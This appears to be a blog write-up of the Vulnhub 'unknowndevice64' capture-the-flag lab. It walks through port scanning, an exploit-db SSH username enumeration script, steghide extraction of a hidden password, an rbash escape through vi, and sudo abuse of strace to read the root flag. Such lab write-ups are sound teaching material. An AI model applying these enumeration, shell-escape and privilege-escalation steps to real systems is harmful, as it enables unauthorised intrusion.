Привет товарищ,
This week, little го́пник, training on Vulnhub. Yep again because practice makes perfect. Period.


Description:
unknowndevice64 v1.0 is a medium level boot2root challenge. The OVA has been tested on both VMware and Virtual Box.Difficulty: IntermediateFlags: Your Goal is to get root and read /root/flag.txtNetworking:DHCP: EnabledIP Address: Automatically assignedHint: Follow your intuitions ... and enumerate! and for any questions, feel free to contact me on Twitter: @unknowndevice64
Happy Hacking..!!

Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/


If you need a little memo about pentest tools, check mine (almost regularly updated).

Setup

My target is at 192.168.56.108

Port scan

nmap -p- -sS -sV 192.168.56.108

I've shrink a little bit the output.

PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)

SimpleHTTPServer

In most of the cases a webserver is a good point to start a pentest.

I've looked the source code of the page and found this:

That lead me to the following page:

And that's it... Nothing more.

That's all folks (really ?)

I've tried to find hidden files on the server:

nikto -h http://192.168.56.108:31337/

=> Nothing

dirb http://192.168.56.108:31337 /usr/share/dirb/wordlists/common.txt

=> Nothing

gobuster -u http://192.168.56.108:31337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php

=> Nothing

I've search for metadata from the key_is_h1dd3n.jpg => Nothing

Extracted all frame of the gif in main page (http://192.168.56.108:31337/ud64.gif).

# Extract frames of gif files
convert ud64.gif out%05d.pgm

# Display all images (1 by 1)
feh

Tried StegSolve tool on key_is_h1dd3n.jpg => Nothing

I started to tell myself that I had to take a look at SSH server.

Use an exploit from exploitdb.com ?

To make it quick, I found an exploit that allow to enumerate user available on the system.

NB: In order to use this exploit you need to modify the line 77 and add a int conversion as follow:

sock.connect((args.target, int(args.port)))

Once everything works you could enumerate user on the target.

python ssh_enum_user.py -p 1337 192.168.56.108 root
[+] root is a valid username

python ssh_enum_user.py -p 1337 192.168.56.108 unknowdevice64
[-] unknowdevice64 is an invalid username

python ssh_enum_user.py -p 1337 192.168.56.108 ud64
[+] ud64 is a valid username

I was surprised the challenge requires to use a not so old famous exploit from exploitdb. After all, the challenge was published on 9 Mar 2019 and the exploit was published on 17 Aug 2018 (after the NVD) that only 1 year old (almost).

But even with this exploit I still did not have access to the machine.

So I reviewed my notes and picked up from the beginning. I finally see what I had missed: There must be a steganography process on the image, one that I have not tested yet but which must be a little bit famous !

After a little search I found the tool I was looking for: steghide

#Using the pass pass: h1dden because of the filename
steghide --extract -sf key_is_h1dd3n.jpg

Finally I can continue !

So the hidden file is a BrainFuck program

cat h1dd3n.txt 
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

Which once decoded give me the pass for the SSH access:

ud64:1M!#64@ud

SSH Access and rbash restriction

As you can see, this confirms that the exploit previously used actually works !

And boom ! Logged in !

When suddenly !

Oh no! not rbash! not again !

A thought then crossed my mind: the program in BrainFuck plus the rbash it makes a lot of coincidences for chance ...
Indeed, looking more closely, the previous challenge Vulnhub I did (Matrix) was created by the same guy as this one (@unknowndevice64), it's totally fortuitous !

So the rest of the challenge will be more easy (that's why practice makes perfect).

In order to escape rbash I will use the same technique as for Matrix challenge.

  1. run VI
  2. run :!/bin/sh from within VI

Now add some tools path...

export PATH=/bin:/usr/bin:$PATH

Get the root flag

After a little bit of recon. I found an interesting stuff:

Item of interest

This means that we can execute the command /usr/bin/sysud64 as root without need of any password.

After a little bit of research I found that sysud64 is an alias for the command strace, that is used to trace system calls and signals.

So let's dig into the manual of this tool to find a way to execute, let's says, bash commands.

Here we go !

Do your homework: RTFM

With this information in mind let's get the root flag !

sudo sysud64 -u root cat /root/flag.txt > /home/ud64/flagRoot.txt
sudo sysud64 -u root chmod 777 /home/ud64/flagRoot.txt
cat flagRoot.txt

     ___    _                _                                  
    / _ \  | |              | |                                 
   / /_\ \ | |__   __ _  ___| | _____ _ __                      
   |  _  | | '_ \ / _` |/ __| |/ / _ \ '__|                     
   | | | | | | | | (_| | (__|   <  __/ |                        
   \_| |_/ |_| |_|\__,_|\___|_|\_\___|_|                        

        _                    __             _                   
       | |                  / _|           | |                  
     __| | ___   ___  ___  | |_ ___  _ __  | | _____   _____    
    / _` |/ _ \ / _ \/ __| |  _/ _ \| '__| | |/ _ \ \ / / _ \   
   | (_| | (_) |  __/\__ \ | || (_) | |    | | (_) \ V /  __/   
    \__,_|\___/ \___||___/ |_| \___/|_|    |_|\___/ \_/ \___|   

             _           _           _   _                      
            | |         | |         | | | |                     
   __      _| |__   __ _| |_    ___ | |_| |__   ___ _ __ ___    
   \ \ /\ / / '_ \ / _` | __|  / _ \| __| '_ \ / _ \ '__/ __|   
    \ V  V /| | | | (_| | |_  | (_) | |_| | | |  __/ |  \__ \   
     \_/\_/ |_| |_|\__,_|\__|  \___/ \__|_| |_|\___|_|  |___/   

                        _     _               _         _       
                       | |   | |             | |       | |      
   __      _____  _   _| | __| |  _ __   ___ | |_    __| | ___  
   \ \ /\ / / _ \| | | | |/ _` | | '_ \ / _ \| __|  / _` |/ _ \
    \ V  V / (_) | |_| | | (_| | | | | | (_) | |_  | (_| | (_) |
     \_/\_/ \___/ \__,_|_|\__,_| |_| |_|\___/ \__|  \__,_|\___/


      __                                                         
    / _|                                                        
    | |_ ___  _ __   _ __ ___   ___  _ __   ___ _   _            
    |  _/ _ \| '__| | '_ ` _ \ / _ \| '_ \ / _ \ | | |           
    | || (_) | |    | | | | | | (_) | | | |  __/ |_| |_          
    |_| \___/|_|    |_| |_| |_|\___/|_| |_|\___|\__, (_)         
                                                 __/ |           
                                                |___/            

 _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  _  
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( . | / | u | n | k | n | o | w | n | d | e | v | i | c | e | 6 |4 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/

Conclusion

I resolved this challenge quickly.
I am a little disappointed, I was expecting something more difficult.
At least I can say that either I become better or I remember better what I did before.

I keep in mind the use of Ste                                                        Stories gSolve for the next time !


Social stuff / Questions / Comments

Feel free to reach or tips me !

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work please consider make a donation
Tipeee: https://fr.tipeee.com/ags-syndrome